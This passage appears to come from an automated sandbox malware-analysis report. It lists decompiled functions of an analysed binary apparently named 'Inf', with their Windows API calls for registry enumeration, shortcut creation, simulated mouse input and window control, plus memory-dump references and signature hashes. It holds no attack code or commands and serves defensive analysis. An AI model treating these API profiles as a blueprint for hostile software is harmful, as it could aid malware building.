                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6b6be7d0f06f39bb3ecf1ad937872fb8656b2456884ed5d64f7e3675fb141157
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8db0f03ee6f82cc9707e22b74796ec3f64a34b6bfc81686e8f2e630a1d94d0a1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b6be7d0f06f39bb3ecf1ad937872fb8656b2456884ed5d64f7e3675fb141157
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51F176600206AFEB258F64CD81FBF77AAEFC2754F154669FC05D6140EB34DC5086A2
                                                                                                                                                                                                                                                                                                    Function 00A9C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A9C10E,?,?), ref: 00A9D415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9C72A
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A9C785
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9C7CA
                                                                                                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A9C7F9
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A9C853
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A9C85F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8a545b04b9743704fe844210e9e3606bb28748e600c1f0e8ed5498ec98c805c8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 29604d2a8ea341e1f4de392f96efd6b576d28bb4d728872f2bd18c1a0df4f9b4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a545b04b9743704fe844210e9e3606bb28748e600c1f0e8ed5498ec98c805c8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC81A070208641AFCB14DF64C985E6ABBF5FF84318F14895CF4964B2A2DB31ED46CB92
                                                                                                                                                                                                                                                                                                    Function 00A7009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 00A700A9
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00A70150
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00A70354,00000000), ref: 00A70179
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(00A70354), ref: 00A7019D
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00A70354,00000000), ref: 00A701A1
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A701AB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1bcc68a412a12581bf56901a0c7c012da2ba3d794a16ff0728664ca9f596eb45
                                                                                                                                                                                                                                                                                                    • Instruction ID: b932e078f50625cfc0a479625596f6cce6ef0dc893a57c5995e2b14140ebbb78
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bcc68a412a12581bf56901a0c7c012da2ba3d794a16ff0728664ca9f596eb45
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E251B432650310EBCF20AB64DC99E69B3A5AF45311F24D446F90EEF297DB709C41CB96
                                                                                                                                                                                                                                                                                                    Function 00A89B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00A89F2A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A89F4B
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A89F72
                                                                                                                                                                                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00A89FCA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                                    • String ID: X
                                                                                                                                                                                                                                                                                                    • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                                    • Opcode ID: 232e215dedb3d9adb229ccd263a60d3a478b178dc3507e75348b38d6c1fb9c3f
                                                                                                                                                                                                                                                                                                    • Instruction ID: ae1f127a7f632a9573d11610b074c8240b934adc2cb92e495e01752c7708d7b1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 232e215dedb3d9adb229ccd263a60d3a478b178dc3507e75348b38d6c1fb9c3f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5E18271608340DFD724EF24C981AABB7E1BF85314F04896DF8899B2A2DB31DD45CB92
                                                                                                                                                                                                                                                                                                    Function 00A86ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A86F21
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00A8707E
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00AB0CC4,00000000,00000001,00AB0B34,?), ref: 00A87095
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A87319
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                    • Opcode ID: 645dae2a7c556a2bdb5e50a1953e05c0a5123a871c6fd8086276066f570fe906
                                                                                                                                                                                                                                                                                                    • Instruction ID: ef996359ab4da059bf39b052be88c6761ff7b80f552ac147d64f8ee1f99ed979
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 645dae2a7c556a2bdb5e50a1953e05c0a5123a871c6fd8086276066f570fe906
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FD14771508201AFD304EF24C981EABB7E8FF98704F50496DF5968B2A2DB71ED45CB92
                                                                                                                                                                                                                                                                                                    Function 00A11B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00A11B35
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A11B99
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00A11BB6
                                                                                                                                                                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A11BC7
                                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00A11C15
                                                                                                                                                                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A53287
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11C2D: BeginPath.GDI32(00000000), ref: 00A11C4B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 136d44949af35677947109842f6a84ad271248fdbb5f50878e51961158f29d7a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 663f010bb1bfa9ffb3f4bb49825ba84a5aa3fcfc252d6969b078426619575d1c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 136d44949af35677947109842f6a84ad271248fdbb5f50878e51961158f29d7a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7741CF71108341AFCB10DF64DCC4FBA7BB8EB56324F040669FA958A1E2C7309985DB62
                                                                                                                                                                                                                                                                                                    Function 00A81196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A811B3
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A811EE
                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00A8120A
                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00A81283
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A8129A
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A812C8
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6abd2ac23d4f8dce09c0e3bb33f31a34551429bc2570f5dcc098724cd08fa501
                                                                                                                                                                                                                                                                                                    • Instruction ID: b6b53c6510e249e5525d45deb0c9b5e7d0ba0c0cf64a990309d738890687a8a1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6abd2ac23d4f8dce09c0e3bb33f31a34551429bc2570f5dcc098724cd08fa501
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B418B71900205EFDF04EF94DC85AAAB7B8FF04300F1041A9FD009A296DB30DE56DBA0
                                                                                                                                                                                                                                                                                                    Function 00AA8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00A6FBEF,00000000,?,?,00000000,?,00A539E2,00000004,00000000,00000000), ref: 00AA8CA7
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00AA8CCD
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00AA8D2C
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00AA8D40
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00AA8D66
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00AA8D8A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5de74e27769beb4455be1a8cbe79d1cf04bcd1613441efcc6e412d4c9057ab96
                                                                                                                                                                                                                                                                                                    • Instruction ID: b2e05d4ef3b407e72722e15ed13ed68ba28d8da695625a276cd0a56538366705
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5de74e27769beb4455be1a8cbe79d1cf04bcd1613441efcc6e412d4c9057ab96
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A419130602245AFDB25DF64C889BA57BF1FB47314F1850A9E5494F2E3CB39A856CF60
                                                                                                                                                                                                                                                                                                    Function 00A92D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00A92D45
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8EF33: GetWindowRect.USER32(?,?), ref: 00A8EF4B
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A92D6F
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00A92D76
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A92DB2
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00A92DDE
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A92E3C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0f9a40124a1339ae9d2d9f1bc221c8ceac24bc6def347cfbf0399c25fdb5aa45
                                                                                                                                                                                                                                                                                                    • Instruction ID: 85ac84c3d74f62205b79c090c2a6b7f5e71e963940601b2a9a14036a06988877
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f9a40124a1339ae9d2d9f1bc221c8ceac24bc6def347cfbf0399c25fdb5aa45
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D131D072605316AFCB20DF54C849B9BB7E9FBC5314F000919F489A7191DB30EA09CBD2
                                                                                                                                                                                                                                                                                                    Function 00A755E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00A755F9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A75616
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A7564E
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7566C
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A75674
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00A7567E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 726fd47458f66809a01e374c572dfacd37105ab54b819017cfd16e8f599d61c1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 52fdc66b1e603f058f3a32d51f42c68ba5f8a2eaef3c10b473e5777b1114eab3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 726fd47458f66809a01e374c572dfacd37105ab54b819017cfd16e8f599d61c1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D213572A046007BEB159B79DC49E7FBBA8DF49720F18C02DF80ACA091EFA1DC419760
                                                                                                                                                                                                                                                                                                    Function 00A86263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A155D1,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A15871
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A862C0
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00A863DA
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00AB0CC4,00000000,00000001,00AB0B34,?), ref: 00A863F3
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A86411
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
